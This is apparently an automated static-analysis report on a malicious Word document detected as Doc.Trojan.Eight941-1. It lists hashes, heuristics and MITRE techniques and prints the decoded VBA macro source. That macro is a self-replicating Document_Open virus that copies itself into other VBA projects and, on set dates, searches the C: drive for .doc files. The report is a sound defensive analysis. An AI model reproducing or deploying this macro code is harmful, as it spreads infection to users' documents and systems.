Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 815c2fcdd4a6e5ac…

MALICIOUS

Office (OLE)

47.0 KB Created: 2000-04-03 09:55:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ea87b1a7d80c0d2248d242b9b772a936 SHA-1: d390c2544a38ce095a5203d562247d17931f0291 SHA-256: 815c2fcdd4a6e5acba2db48f291773b839dcba9a13381b7a813ee9e2ca39460a
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV heuristic and the presence of a Document_Open VBA macro indicate malicious intent. The macro attempts to copy itself to other VBA projects, suggesting an effort to persist or spread. The specific date check in the macro (November 10th or July 1st) is unusual and may be a trigger for further malicious activity, though the full payload is truncated.

Heuristics 3

  • ClamAV: Doc.Trojan.Eight941-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Eight941-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2398 bytes
SHA-256: 171ab244a677f6e58a515d3fbe044886f745524907f2ec3e5afc8c7aee8c505f
Detection
ClamAV: Doc.Trojan.Eight941-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


















Private Sub Document_Open()
On Error GoTo 0
Dim i, j As Integer
j = -1
For i = 1 To Application.VBE.VBProjects.Count
    If Application.VBE.VBProjects(i).Name = "Normal" Then
        j = i
    End If
    If Application.VBE.VBProjects(i).VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 100) = False Then
        Dim B, l As Integer
            If j > 0 Then
                If Application.VBE.VBProjects(j).VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 100) = True Then
                    B = Application.VBE.VBProjects(j).VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
                    l = Application.VBE.VBProjects(j).VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
                    Application.VBE.VBProjects(i).VBComponents(1).CodeModule.AddFromString Application.VBE.VBProjects(j).VBComponents(1).CodeModule.Lines(B, B + l)
                Else
                    B = Me.VBProject.VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
                    l = Me.VBProject.VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
                    Application.VBE.VBProjects(i).VBComponents(1).CodeModule.AddFromString Me.VBProject.VBComponents(1).CodeModule.Lines(B, B + l)
            End If
        End If
    End If
Next i
If (Month(Date) = 11 And Day(Date) = 10) Or (Month(Date) = 7 And Day(Date) = 1) Then
Set fs = Application.FileSearch
    fs.LookIn = "c:\"
    fs.FileName = "*.doc"
    fs.SearchSubFolders = True
    If fs.Execute() > 0 Then
        For i = 1 To fs.FoundFiles.Count
            On Error GoTo Exitsub
            Options.AllowFastSave = True
            Options.BackgroundSave = True
            Options.CreateBackup = False
            Options.SavePropertiesPrompt = False
            Options.SaveNormalPrompt = False
            
           
Exitsub:
        On Error GoTo 0
        Next i
    End If
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.